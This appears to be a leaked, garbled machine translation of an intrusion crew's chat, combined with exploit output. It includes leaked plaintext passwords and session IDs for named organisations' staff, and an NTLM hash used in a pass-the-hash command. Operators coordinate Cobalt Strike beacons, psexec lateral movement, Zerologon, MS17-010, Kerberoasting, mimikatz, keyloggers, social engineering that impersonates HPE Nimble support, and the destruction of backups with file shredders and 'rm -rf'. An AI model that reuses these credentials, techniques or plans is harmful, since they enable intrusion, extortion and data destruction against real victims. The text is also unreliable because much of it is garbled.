[+] Found bookmark {'name': 'Temp PC', 'username': 'luis.fernandez', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.153'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 335, 'name': 'Accurint', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'secure.accurint.com/app/bps/main'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 24, 'name': 'Ambry Folder', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '\\\\10.10.10.2\\File_Share\\\FD3\\\Ambry'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'nia.johnson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.138'}
[**] Found bookmark with creds
[+] Found bookmark {'name': 'Connect to my PC...', 'username': 'lori.thompson', 'password': 'Grant2020', 'service': 'RDP', 'host': '10.10.10.148'}
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 213, 'name': 'Connect to my pc...', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': '10.10.10.186'}
?till 12plus minusga all 3 in the shit? they're already pretty used by TV - but okay)) yeah, right))) there are three more from friday like you at 0? do you have coba? take it?
[+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

[+] Leaking sessions to dump configuration.
      [+] Found: SessionID: 00KnsFUYwElND7n9AuOv0gXkEMbDbJNZdIGsGhuxVlA= userType: 1 userName: fmancuso Password: kilroyFRM321# Domain: CANALBARGE
      [+] Found: SessionID: 1aH0W0vgfKKUorMuzi0O91xtWTq01SJkw55W0d0X3UtY= userType: 1 userName: lcall Password: lc020109123//? Domain: CANALBARGE
      [+] Found: SessionID: 2HEgBXoesL1OZFmh8HwZevBxOKP07mEzHL0BJyBZ7mk= userType: 1 userName: challman Password: CHvita93! Domain: CANALBARGE
      [+] Found: SessionID: 7YA1Bbya5MRWbmtI7jQDTuCFpNr3TP0z7IZx21i7HXk= userType: 1 userName: gcalvillo Password: Lali022315 Domain: CANALBARGE
      [+] Found: SessionID: 81QtVcg20XnqLBycgw0H709ZpGKXKyFxRfv3gNFwB0M= userType: 1 userName: jturner Password: Pe@ches_!!# Domain: CANALBARGE
      [+] Found: SessionID: ALZ3k7QjO81pgnMp1YtD08SHOZE8QVDW90O9VORUvkM= userType: 1 userName: tknight Password: CBCdispatch97 Domain: CANALBARGE
      [+] Found: SessionID: GXK01m2Etj8y21LW3cYF0MpcyqxgEhKq21QvKkPx34E= userType: 1 userName: dhysaw Password: Vinger110106 Domain: CANALBARGE
      [+] Found: SessionID: HOlgsgsrlafclFRwWLx1eIg2eYApSN3pGIcbizsJXFg= userType: 1 userName: mcampbel Password: Wrc1129** Domain: CANALBARGE
      [+] Found: SessionID: NTkdkB29z1ZQ08GTBZ4zMfUnoHeC8PIqs9MQ5khx4Co= userType: 1 userName: bbarrere Password: @BnBe19310918CB2 Domain: CANALBARGE
      [+] Found: SessionID: Q072oyaSMM6DTm1Z63Rv4mFIZCy7SbSf1zsxUlCgplM= userType: 1 userName: kcamp Password: KC2020cbc Domain: CANALBARGE
      [+] Found: SessionID: QAhh9tF6cM3n5ifnj8vQBZ67JWzbZl2GT8EHJhhuF7Y= userType: 1 userName: ccatalan Password: CC6013cbc1986 Domain: CANALBARGE
      [+] Found: SessionID: QwRMW03QsuEUsKGpfNIraSL1YDXVaxgv28n0U5e18Q8= userType: 1 userName: sespinoza Password: 0306!Jessica Domain: CANALBARGE
      [+] Found: SessionID: Rx0VXlABY6z7akQcpBgjA9l7CF11QWT1Cm5tvvvBr98= userType: 1 userName: tkish Password: TJball44!!! Domain: CANALBARGE
      [+] Found: SessionID: S14OBRRWdwgNN18yL6W6WClFDN0Wu1ZKGKeuG9I0pR4CA= userType: 1 userName: ttoups Password: TOTcbc1987 Domain: CANALBARGE
      [+] Found: SessionID: a8cbVmuMbdiLvi1vihNYw3a8ccWoAq6QCxzCYEDeAxiMo= userType: 1 userName: rblanchard Password: Scottieb72985* Domain: CANALBARGE
      [+] Found: SessionID: fwgzABLIR1cfsBeDPA3CbAPQYKfK4f6RS9H2Qmq6x4U= userType: 1 userName: bwondolowski Password: Traffic2262 Domain: CANALBARGE
      [+] Found: SessionID: klh5xtYgFH7mynHLcz3c0Ah2H4rtdLUGkCyngUsrPeQ= userType: 1 userName: jreyes Password: God&faith* Domain: CANALBARGE
      [+] Found: SessionID: o3I1l3SxuvwPhyNxdf9kUDAIUjHNJJqGfzTbuG3TQxY= userType: 1 userName: slohja Password: Uwo16Uit Domain: CANALBARGE
      [+] Found: SessionID: t3fe0eWXhK7po1NFPp91aHk0oWLkaxMiRkdjxgwiA4E= userType: 1 userName: tmerrick Password: SAdie*$)pup5geaux Domain: CANALBARGE
      [+] Found: SessionID: tsrxhNflmtcBJ5WYaJEiLQubk9YjWrauMksnaOrW1UU= userType: 1 userName: jmaynard Password: Jm120113!!3 Domain: CANALBARGE
      [+] Found: SessionID: ylrGw1eBBh1ocAYKzymIB2oKDGSHvpuv3FQzgwL0WCQ= userType: 1 userName: bhulin Password: Joseph1959!@ Domain: CANALBARGE
      [+] Found: SessionID: z2zpQ7tyFfBQdFnQr7ICr7igVCx08u1qAjbTuORdFvQug= userType: 1 userName: jballard Password: JB$Williesmuckers1 Domain: CANALBARGE
``@tl1
how long before tonight? @user4 says it fell offpngcpower with nothing to work with so you have nothing to work with? or tv with? new sessions will be @tl1iandreevsnikitenkostalinottl2tl1admin good night
See you tomorrow = )Adios, everyone, see you tomorrowhttp://vk.com/@thntofff-ataki-na-active-directory-razbiraem-aktualnye-metody-povhshe all gonehiiGood morningMay someone open the door? Good night, everyone) I wrote that no@tl1 New grids will be today? not everywhere there is a note keylogging? they're not itching at all ... well, I see) waiting for entry + alerts not alerts more than 30 minutes how long will wait for alerts? at threetut, I checked the mail as if one @user8 all does everything look at the files there@all where are we? so they certainly changed passes) yeah
at first the exh was not available, but the problem was in the proc))
i checked 4 admins - no passwords? no, i can't get info on rtp in the mail? ready at 17:30 thank you + keylog is ready, anyone have a blauer? all have a keylog working at yours? i except blauer have 1, 3 know exactly what i have, do we all have sessions?
 displayName: Dianne Jarden
>displayName: Brandon Lauer
>displayName: Greg Keller
>displayName: Mark Harper
>displayName: Mike Pusatera
Or at 5:00 in the morning? What are they writing there 2 people at #1-done-rtpcompany-com read the post at 4:30 ready at 5 work with water at 5 that's it, it didn't want to go in, it only went in at 10.
The following snapshots listed under volumes or snapshot collections listed under volume collections are not considered *unmanaged* by the Case Automation rules because they are managed by a different process than a retention policy:
a) Triggered by user action; these are considered *manual* snapshots
b) Triggered by third party software, the REST API, or a script; these are considered *externally triggered* snapshots
c) Triggered by HPE Nimble Storage Array due to a user action, such as volume restore, resize, promote, demote; these are considered *manual* snapshots
d) Triggered by an agent (such as VMware VVOL); these are considered *externally triggered* snapshots
e) Triggered by *handover* action; these snapshots are considered *manual* snapshots but currently managed by the retention schedule and require no user action

In situation where the condition above is not resolved, the Case Automation will open another case after the time period defined as "Sleep Time".
The default "Sleep Time" for the Unmanaged Snapshot(s) Case Automation is 12 days, but may be changed, if so desired.
If the Array Group was updated to NimbleOS 5.1.x for over 90 days and unmanaged snapshots are over 90 days old, those snapshots will no longer trigger Case Automation to avoid repeat notification.
If you wish to no longer have cases opened nor receive case notifications for this alert type, you may disable this alert from generating cases completely for your array as follows: login to the HPE InfoSight Web Portal at http://infosight.hpe.com/ Under the Wellness tab,
* Click the "Configure Wellness Rules" button
* To disable case creation and notification for all arrays, uncheck the "Create Issue?" checkbox next to the rule named "Condition Name".
* To disable case creation and notification for a specific array:
* Expand the "Condition Name" rule by selecting the "+" sign next to the rule name
* Uncheck the "Create Issue?" checkbox next to a specific serial number.

NOTE: After the automatic case generation has been disabled (removed) for a certain condition, there will not be any more automatic cases created until the case generation is re-enabled manually.

If you have additional questions or require assistance, please reply to this email and an HPE Nimble Storage Support engineer will reach out to you. If you choose to contact HPE Nimble Storage Support by phone regarding this issue, please be sure to provide the case number in order to facilitate a rapid resolution.

Telephone and Email Support is available 24x7. Contact details for your location can be found at the following web page: https://www.hpe.com/us/en/services/nimble-storage.html

For your convenience, the following is the U.S. support contact information:
Toll-free: 1-877-3NIMBLE (877-364-6253), extension 2
Local: 408-432-9600, extension 2
Email: support@nimblestorage.com

For other international support phone numbers, scroll down to HPE Nimble Support section and expand the "Technical Support Phone Numbers" on the webpage: https://www.hpe.com/us/en/services/nimble-storage.html

***********************************************************************************
CASE REFERENCE NUMBER REQUIRED - DO NOT MODIFY ref:_00D80aba6._5002H1HQkfz:ref
***********************************************************************************
NOTE: This is an automated alert sent from Salesforce.com. This email message is for the sole use of the intended recipient(s) and contains confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. Alert ID: https://nimblestorage.my.salesforce.com/00X80000001v7Fw

CONFIDENTIALITY NOTICE: The materials enclosed with this email transmission are private and confidential. The information contained in the material is privileged and is intended only for the use of the individual(s) or entity(ies) named above. If you are not the intended recipient, be advised that unauthorized use, disclosure, copying, distribution or the taking of any action in reliance on the contents of this emailed information is strictly prohibited. If you have received this email transmission in error, please notify the sender immediately by return email, delete this communication and destroy all copies.
``Thank you''.
* Nimble OS $ snap --list --all --unmanaged
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ N/A

b) Choose appropriate value for the expiration of the unmanaged snapshots and check which snapshots already expired, which ones will expire and when.

NOTE: Negative value shows when snapshots would have already expired, positive value show in what amount of time the snapshots will expire based on value and units checked.

* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots check --snap_ttl 24 --snap_ttl_unit hours
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 default:/ +23.96 hours

c) Select snapshots which you prefer to keep for longer than the rest of unmanaged snapshots and edit the TTL value directly. This can be done on the snap and snapcoll levels.

* Nimble OS $ snap --edit <snapshot_name> --vol <volume_name> --ttl <numeric_value> --ttl_unit <unit>

Example:
* Nimble OS $ snap --edit vc1-vc1s1-2019-04-29::17:56:00.000 --vol v1 --ttl 60 --ttl_unit days

d) Change TTL to enabled state and choose appropriate units and value of units.

NOTE: It is recommended to select expiry unit value higher than any other currently present schedule in order to ensure snapshots have enough retention as required.

* Nimble OS $ group --autoclean_unmanaged_snapshots yes --snap_ttl <numeric_value> --snap_ttl_unit <unit>

Example:
* Nimble OS $ group --autoclean_unmanaged_snapshots on --snap_ttl 30 --snap_ttl_unit days
* INFO: Snapshot Time-to-live is set to 30 days.

e) Verify the list of unmanaged snapshots has had expiry time updated as desired:

* Nimble OS $ snap --list --unmanaged --all
### cut for brevity ###
* v1 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +8.57 weeks
* v2 vc1-vc1s1-2019-04-29::17:56:00.000 10 No Okay unknown default:/ +4.29 weeks
``````
A new case #04124985 has been created for you with Nimble Storage. Information about the case is listed below.

Account Name: Waterway Gas & Wash Company Array SN: AF-180176 Array Name: ww-nimble-01 Nimble Group Name:
Case Number: 04124985
Case Priority: P3
Case Category: Snapshots
Case Origin: Autosupport
Case Owner: Support Queue - General

Case Subject: Unmanaged snapshot(s) have been detected due to configuration change Case Description: PLEASE NOTE: This is an automatically closed case, if condition is expected, no reply is required.
Additional information regarding the issue described below is available to you in the form of an HPE InfoSight Knowledge Base (KB) article. Articles are hosted from the HPE InfoSight portal. The link provided will allow direct access for only seven (7) days without requiring that you log in to the InfoSight Portal. Please click on the title link to open or download the article:

https://infosight.hpe.com/InfoSight/dispatch?token=eyJhbGciOiJIUzI1NiJ9.eyJ0b2tlbi10eXBlIjoiZG9jdW1lbnRhdGlvbi5rYkFydGljbGUucmVhZCIsImV4cCI6MTYxMDk4OTMyNCwic3ViIjoiQUYtMTgwMTc2IiwiaWF0IjoxNjEwMzg0NTI0LCJrYi1pZCI6IjAwMDA5NiIsImF1ZCI6IlBvcnRhbCIsImlzcyI6IlBhY2hpbmtvIn0.NYZ3RLJ4tRJssRAnJp-nrFQ-GgPkySPqCSsHQ-X5nM4

HPE Nimble Storage Case Automation has detected unmanaged snapshot(s) on your array.
The snapshot(s) became *unmanaged* due to a configuration change of the volume collection, schedule, or volume association to a volume collection.
In certain situations, snapshot(s) on the downstream replication partner could become unmanaged due to a name change of the volume collection or a schedule on the upstream replication partner.
Because the affected snapshot(s) are no longer managed by a schedule, they will remain on the array indefinitely unless the Time-To-Live (TTL) feature will be enabled or until they have been removed/deleted manually.
As changes accumulate in the parent volume, the snapshot(s) will consume increasing amounts of space.

There are a few considerations regarding the deletion of unmanaged snapshots; please ensure to review the KB article attached to this case for more details.

To avoid these cases in the future, you may enable Time-To-Live feature (TTL), which is available as of NimbleOS 5.1.x.
The feature will expire the snapshots which are considered unmanaged automatically based on the set period of time.
TTL is enabled manually by the user via CLI only. Following, are the recommended steps to enable the feature:

a) List current snapshots which are unmanaged, note that current expiry is set to "N/A" such as in the example:

``Davaiem... let's better copypaste fullscreen messages from nimblahhhhhhahh helpdesk so they collect some from neighboring pc or predict user input))))120 percent is it so they generate 20 percent garbage in the output?)))we only have 1 chance to make keyloggers work at 120 percent where will flash ctrl look where will copy from if there?
```
[ctrl][v]
[ctrl][v]
``ok, now I get the idea that it's realistic once could bemight think that boganulot to alert about logging in all you have to log in 1 in 1 you catch the pass in the keyloggerwill make them log in no, they will do it differently, write on behalf of nimbla) well I mean, that will pass social engineering if they start spamming each other about nimbla?they forward it so it was written a week ago imsvezhaya that fresh but it does not differ from those old that they sent earlier and repeat they forward it to each other but the date is fresh? jan 11 2021 who is the author? now send a screenshot letter to my modest calculations 3 and many times they forwarded the last letter between them (also was long ago) nothing more? a million is how much in our?there was only correspondence with the supplier, but that was a million years ago blah blah blah is for 192.168.0.75 read more carefully i have seenwhen they communicate so did not meet some trust nibl external contactsgkeller there someone explained to someone for nibl as i remember nibl support tell me who they correspond with regarding niblack files and backups in ortpa no, there are several sessions in slip + build and so on prepare for this time sokda hang a hundred years in 4 start vodokaylogger spread?no already, no rts check live sessions quickly hello, user 3 is late where we have @user3 ? hello:space_invader:hii all in place? hello everyone good day)hii sleep well everyone, sessions in the slip, files erased
good night good love is more expensive than money)apparently:D braggingbamba why is it here?)and morefiles were lost? in the slip have thrown sessions? good night good night then this + - to 4-5 nights and until the end until we close two networks tomorrow by 16:00 so we shift to 4 day tomorrow night close if tomorrow morning will not work tomorrow to 11 already be in place in the morning close the grid to 10 todaydavay then today will close it..571 koba you have on the team is the second koba do not even need less than 100 servers, although the grid is not big and if the armies to mount the servers will do with what is there I think just take your colleagues tomorrow planned another 4 in total if you have everything ready we can today will also close tomorrow? no, with the last koba problem is likely to replace tomorrow koba today wait?if there is a problem, then feedback here or if in lsv case you have doubts you can check in your conditions (on the deck) i had the day before yesterday, i think, assembled - it works. and @user9 today i did it, it does not work. hehehehehe nevertheless i had a feeling that he would be fine if he got a little frustrated. really now armas in the network just nothing. yesterday there were more@user4 on the classic zamakte to the servers? looking for access to the trusts, trying to pull the network to kobu nas, check the options, how to interact with armasak write me here 1 person from the team 1 message what are we doing now on your networks mepereperemple) @user9 you had 4.2 give out all please+@user7 give out to colleagues? or you stupidly will not let the client take only a new one wait all day come on quickly1 delayed there are 2 koby newokk @user8 thenokmno carenado help @user8 and @user4 who wants where? @user7 @user9 while the current postponed did not create anything removed[ ](https://mediaeveryone.com/channel/general?msg=p3HK9CSDutpKMds27) and I did not create you anything removed?I don't have a conf) or do you mean #lrhc-org ?@user7 @user9 write me a report in confu I'm digging SNU.EDUgospersportnu I have devry.edu, but I've been digging there for a week and am almost at a dead end, so who has what tasks at the moment?:man_raising_hand:hello to you all good morning:space_invader:thanks to you all, see you tomorrowGood morning:space_invader:good morning
@echo off
for /f %%i in (hosts.txt) do (
	tasklist /s %%i /v >> .\ps.txt
)
``webrootanywhere``wsndomain.com - do not touch
``itc-us.com`` - work with her by kerbals by the way? if you use zerologon successfully there will be a chance to drink in the next day i think, so if you do it till the end today you can do it via @otam where you will take today yes you can do it till the end do it carefully can not promise anything nEveryone can kill the net with the tool above, it can!before you go into groups, write down what's at what stage and don't kill the networkdid not kill the tool:fingers_crossed:where there are deadlockstrendmicro.com/en_us/what-is/zerologon.html before 12 today, on weekends do not workmonitor the input coba for new sessions write to the groups that are active now and the status of itc-us.com in workIf there are new throw, work what about sessions? I have them off4 and 7helloWhere are the rest of you? everyone Hello have you added? `itc-us-com ` name of the confab where to add itc-us-com what is it?ITC.LOCAL it turns out so#itc-us-com ?ITCMA and no yes there is a system with user7 help user1 now i will add you to the team of free users write in groups where systems but no yes tomorrow will be clear or without all this weekend without me.and since you did not sleep tomorrow i will divide the day on "today - sleep - tomorrow" and not today then why tomorrow is tomorrow = today? tomorrow will be clear is still conditional info!!!!!!!!!!!!!!!!!!!!!!!!tomorrow=todaytomorrow=today by 3today by 7todaywrite your statuses in the active groups. any progress? to minimize pvshh i built a huge c# tulkit specifically for you, but it is not stacked with amsy and does not watch as pvshocheen please stop using verashell as much as possible where you can do with dotnet, yes.... i meant SharpView, not PowerView so
stop
what invoke? I've already written about both vpc and vpshshehe we'll find the logs from Misha, we started with him today it seems to output all in a row,just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht if the user is not set, then it looks like something searches forhis error kicks out how so? sharpview does not seek? not seek (sharpview know how to find the users too? super! Yes, you have a Sharpe sniper?hence it should "be able" to read them because it accesses domain controllers logsand you have to run it only from domain admin contexttry sharpsniperit's a good time to test it)we were looking for something like this, i think we found it on veraschel, search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their pc where will be valuable information about the network, just the same should be information about edr, backups, etc. in the problem "search for technicians "actually helps find nts assigned to users, gave you this stuff?```
https://github.com/HunnicCyber/SharpSniper
this is how you check if the current credentials are rolling on the remote pkvs make yourself a token lA for the supposed machine
second - respectively from kmd through >shell@tl2 prompted you)or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$test the easiest way to check access to the file system1) will not be better - because similarly dirty load will be generatedGood friends, please.
We now and in the future will be very often confronted with WPNs. I remember them as a whole + - by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where will lie installers VPN, guidance on finding config files vpnov on different operating systems, and other related to this type of access to the same
```
jump psexec64 10.225.10.200 https
```
pre-generates a dirty binary that could trick even a regular winndef, such attempts are almost guaranteed to create a securiti event-how to check here?) I think you already know what to check this way:
```
jump psexec64 10.225.10.200 https
```
wrong, because this token might not get access at runtime by itself, use primitive tokens, which only fail if access is wrong, or use make_token ```.
pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6
``I'll repeat the last time[ ](https://mediaeveryone.com/channel/general?msg=yHwrHWhtKpBocnuAK) let's get the passwords out of the vannott and move on to the eighth[ ](https://mediaeveryone.com/channel/general?msg=K4jfy6RjSGBrCRC2E) 2[ ](https://mediaeveryone.com/channel/general?msg=vgKtrJmq4LPeLYNQh) 1 or where is it from? they also have YES?) typo ninth) chetu.comdom.helpathome.com + found the "silent" servers?
dom.helpathome.com - @user9 and @user1
saiglobal.com - @user8
@user4 finish his (check.on.com), then joins saiglobal.comfiredi.com@user8 domain? he'll do it@tl1 passni saig @user8 then me and @user1 finish mywas 6 people - 3 grids) he's a priority too and finish them both to myself in dom.helpathome.com)[ ](https://mediaeveryone.com/channel/general?msg=cMScshjiqrspPvE3W) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port there domain saw beacons at https?):wink:where does it go where?When you do `spawn misha`pass - pass it on the domain? by the way + and notice that there and the ip is different and not the one you connect to the right do you see? open and look at your https nobody even looked at their listener in the coba) you asked the coba where the sessions passwhat domain?[ ](https://mediaeveryone.com/channel/general?msg=iPcyxH5o42hFED4T2) that's the coba's ip, and I need a domain, different domains see different trusts from 19 still enough of the colleagues above) there are two of them, right? what trusts are there?.161.126.162 gotovkobu where to pass the session or work with those that remained from there need to do, the other trusts + hell + av + backups then allocate 1 person on saiglobal.com all at the dekat all without a case now? dekat rebooted00 write plz how many trusts in domains domains.helpathome.comhappay.inn so please tell me what grids are up now?[ ](https://mediaeveryone.com/channel/general?msg=HrfgL9vcyE6NR2MMX) .[ ](https://mediaeveryone.com/channel/general?msg=kZc6hgGxJF65QRDgg) .@user8 where are you going? yes-all the groups? sec)+@tl1Add me to them here tooharrau.add me to the confines of Stalinymm, and 1 that did not come upok) there's not so simple3 in the process until you can the first 2 to fall to the others, the third is still waiting? still a session came up) or have not yet connected) but I think the domain disconnected (yes, I work with her now - my yesterday red do not touch it + 1 + that Dc-01 and this session is one grid?strange thingd1 came) yesterday's sessions or yesterday's? either pass each other in the cob sessions or give access to a partner, there as conveniently as possible take one for two are expected 3 pcsIn both eyes:flushed:okomonitor yesterday's cobFriver.local
two sessions - very hovering-sessions alive any?so good:sleeping:good morning)Good afternoon:space_invader:Cheerful morning)Quiet b\quiet night thank you all for todayThe important thing is that the mistakes are passed and the results are thereGood for you and took two DADos to tomorrowcorrects and dedicamacos)until tomorrowtodaytodaytodaytoday it's a long time let's finishtakahe good option to look for sploits and check for lpe we have services in the network, we check them in the case in situations to sort out theoretical up to search for the name of the dog admin as a password) well, and if it did not pass?)) poured in the archive, which was in the requirements for the reportitsituation is theoretical)ftp sploitvoprosy
almost all of us today do not have polzaki la
no credits (nowhere at all)
go up does not work
logically need to scan the network, look for 7/xp/sql and so on - and sploat them
let's say the kerb is still unhackable
keyloggers, fakelogons....
Inway
I might have missed something, but that's pretty much it.
what else interesting things can be done in such a situation? so, all poured files with hell and other things? yes, i checked on 4 phones at home - does not work on any of them tomorrow by 15 who do not know vpinp.net
```
User is not LA
creeds from browsers
AD info
Checked the non-ABA test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
mimikatz value::creds
session crashed
``We've got a cart that's not working.helpathome.com
```
The user is not LA
browsers creds
AD info
Checked the non-AB\test domain
Got the LA\DA\EA lists
sitifno
ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-076)
Share-Finder (process died)
GPPP-Pass
Invoke_Kerberoast
mimikatz value::creds
Ping machines in the domain
Portscan to standard ports
session crashed

session is back
kerb hash reset - started to check for validity
checked user - yes, password has not changed for a long time
tried to check validity via net use - got syntax error
session crashed
``@user7 didn't you get a session? collected information from the machine adinf, sylbelt, sharpweb, rubeus kerb, invok kerb, tried no gpp (found nothing)
ran through the folders.
went from ad coputers to windows 2003 and HP.
pinged them and made a list
Alexei connected and on one of the vin 2003 machines he brought up the system
with the YES Credentials filled in the dll and started it up.
took hashes from the dc
started to complete the list of servers, decided to make life easier leha script and fakal doc over which sat all this time as got hell infogroups were, the current user does not enter them anyone had such a situation with LA as I described? that there is no direct reference to the current user, but there are other groups?
Received session:
	UserName: forstern (not a local admin)
	HostName: SHO-LT-4726W10
	Domain: bnpmedia.com

Got it:
	AdFind
	DCs
	DA
	EA
	LA (SHO-LT-4726W10)
	SeatBelt
	WinPeas
	Kerb-hash (Rubeus)
	1 password from browser (SharpWeb) by MSOutLook

It didn't work:
	CVE-2020-0796 - session in system context did not spawn, no error
	Net-GPPPasswords.exe - it parried, it did not give me any credits
	Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast
	smb_login - ran MSOutLook password on the current subnet, no machine
			came up
	SharpChrome - didn't give out any credits

Did not have time:
	MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008, had time to ping not all, planned to run ms_17_010_psexec on successfully pinged.

Also sorted the servers into groups.

OpenVPN and ScreenConnector configurations were found on the computer.
OpenVPN could not be deployed on the harddisk.
``````
*CHETU.COM
unchecked AD info
removed net accounts /dom net group "domain admins" /dom net group "enterprise admins" /dom
stripped the invoke-kerberos and gave them to the brute force
SeatBelt + winPEAS
CharpChrome - pulled out 10 passwords that fit the length of the domain requirements.
Raise the privileges did not work, in spite of the not updated Windows
From ad_computers I checked out the server computers and added pings to the list.
Found a backup file OneNote passwords.one (On 8-27-2020).one on the system.
Prepared a list of interesting files on the FS (unattend and office docks)`` just the first line in the message with the "report" name conf confi to know where there is a situation write more immediately on what grid plizharrau.in
```
1) Take off the browser Credits Chrome and then all the rest
2) Take off AD_Users
3) take off YES
4) removed local
5) Remove mimic
6) Collected password files
7) Halfway through the system
8) Started looking at the network for further movement
9) Sorting data
10) Preparing reports

The connection is lost.

```
friver.local
```
Helping User7

1) Checked subnets
2) Chose a subnet, checked on ms17 found one car, threw the session in the armitage
3) Took down hashdam and mimic.
4) Found YES.
5) Got a dump from DS.

```
https://mediaeveryone.com/channel/general?msg=8Wui2GjymD9ouq2fJобмен experience peculiar) suddenly someone will have good thoughts on the problems of another let everyone understand the situation on the grids write directly here where to write? \For each of your grids write overall score for today, what's up, what's done, what worked, what did not work, questions, let's probably summarize the results todayhodu too long search, missed the opportunity to that another kobu try to `s?
AHyHax beacon> spawn https
``Are there any uses? shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txtshell nltest /dclist:c360losal is@user1 @user3 catch it should be careful because it is quite strong floods I'll tell you this, 3 times in a row run, admins will burn the network load and throw everyone)server and user OS he checks the balls on each pc in the domain I was more about the algorithm itself `` ``
performs two functions at once, if we start it from a user context and see immediately available ADMIN$ balloons - it means we are local admin there and can already move there
if there are no such machines in the network - at least we get a list of available balls for reading, which may contain information relevant to upgrade privileges
You understand how shuffinder works, don't you? and it's server subnets at this scale are better to scan /24. So you need 20 domains, take off the ad_computer, ping the servers and connect the port? no, in 1 domain) in each domain?of the pluses, there is already YES, from the minuses there are still 19 trusts, I'll tell you when I runWe have automatic spoiling on such fruitovorov they pass you and see that you on 10 sessions in the cobs did not fructify, I pass @user1 @user3 sessions on the casexDseek ways to the cloud, look for the cradleshttp://arhangel.ru/fortune/online/taro/maps will prompt the right wayalgorithm is clear, but if the AV will be cloud and his server is not in the network?)hell certainly do not need to remove, but you can)well algorithm is clear, go fix the same, but is it enough for you?)portscans sorting all that's what we do on saturday,so what did we do,let's move on to the networK practice.Good morning,good morningGood morningGood morning to all:space_invader: All good morningon the forum access is closeddrop user1 everywhere + change passes in the shared resources, the coba it will be closed for 2 hoursI thought I was on the wrong forum go)) oops fucked up,already up) and what domain?it is lying)why? yes, so good that they themselves now do not get on the forum)@user1 on the forum and everywhere else is closed? There may be fewer detects than on the current active, or additional functionalityI have not looked, it does not develop. The point of it? Another analogue on the empire? Of course I tried different ones. At different ports.Pointed to the inner ipe? Ratnik does not work, no bounce check those 2 softy about which above wrote? Yes, I know, they just do not yet (sessions would ususer1 does not work with us.I have you offlineWhat do you mean where? Where is @user1 @user3?
https://www.youtube.com/watch?v=OvESADFx2eEСхема remote MITM attack on WSUS system

tv with what to work with7:space_invader:hihiwhich all hello to user1 while all are busy, reserve for us) there is a fresh to work grid, if anyone without a job - beep in pm please where you pass + + others who are without tasks now - write, do not keep silent
i got it right - two interfaces on the touchceno also from chetu by the looks of on chetu just there, i move sideways and then the session came but the ip is different now run if you do not have session thrown me chetu? hello there. everything. sait i got it back khanypot it's definitely averm i think it's aB`threattest.edgewave.com i don't have a live one yet, who has sessions left elsewhere ?on regbest.com should be coming soon session from chetu.com - tell me how it will arrive .binverno10 minutes
it will now be ready to palyoad - i will make all hello, we need dllk segonday for the bounce, right? so, let me give you access to 2 prodomains at once one. @user7 there are 2 more people on the roadwhich second?)and where is the other half?)helloHiHiHiHiHiHiHiHiHiHi, you never keep more than 10-15 active sessionsokwhen you need to do related work in 4.1client do not removedamy to 4.2 go for final? + ok, then all have 4.2 cleaneno 4.2 i also haveona 4.1 in my koba yesterday closed the gofer?:heavy_plus_sign:+ everybody have coba 4.2?:heavy_plus_sign:+++tasks are clear to all? hiGood evening:space_invader:add me to the comrades in confabs let's write from one dude to another about pass from nimbla[ ](https://mediaeveryone.com/channel/general?msg=a7bE4sNqbM6uRkvJG) flows against the current[ ](https://mediaeveryone.com/channel/general?msg=3YDeQbYx3iq2NzQik) what? in water the scheme is unusual we close two networks at once?
there's a couple of people in the water, some neurotics who go to these nimbles, but they don't save their passwords anywhere, and they're reloading their mail.
once again on the computers/servers went through\to the browsers files with passwords and what were you doing? how are you getting on? google help)[ ](https://mediaeveryone.com/channel/general?msg=QPvucTEsDKGjawem2) is this something that already exists, or do you have to do? which can overwrite a network drive a few times console fileshredder[ ](https://mediaeveryone.com/channel/general?msg=xNu8E3Moc2RP4oAJv) and more? to overwrite backups if it does not encrypt[ ](https://mediaeveryone.com/channel/general?msg=YW4zCCrXYpf7Q7Hvu) go to ssh and rm -rf-prepare more filehreddertoday I'll try over the garbage if lin will allow. it's pretty neutered there or check their disks all?we've been mashing them and mashing them and mashing them and mashing them and mashing them. we still haven't updated to 10[ ](https://mediaeveryone.com/channel/general?msg=Y9hzbFuc43vehpwWG) to all esx? We have to look at the confab first, clarify what lin systems are there? there is a skul, there is mail (one), there are listings and files, there is access to esx all or not all at #rtpcompany-com more precisely say without like in #rtpcompany-com *almost* everything is ready
in #waterway-com the skool is rolled out, there's a problem with the mail, there's a problem with backupsBackups on the mega have not goneBackups are trying to take off
